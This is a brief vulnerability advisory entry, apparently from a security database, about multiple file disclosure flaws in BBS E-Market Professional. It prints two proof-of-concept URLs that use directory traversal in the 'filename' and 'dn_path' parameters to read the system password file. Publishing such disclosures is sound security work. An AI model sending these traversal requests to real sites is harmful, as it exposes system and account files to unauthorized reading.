|
|
BBS E-Market Professional Multiple File Disclosure Vulnerabilities
No exploit is required. The following proof of concept is available: http://www.example.com/bemarket/shop/index.php?pageurl=viewpage& filename=../../../../../../../../[etc]/[passwd] http://www.example.com/becommunity/board/f_down.php?dn_path= /../../../../../../../../../[etc]/[passwd] |
|
Privacy Statement |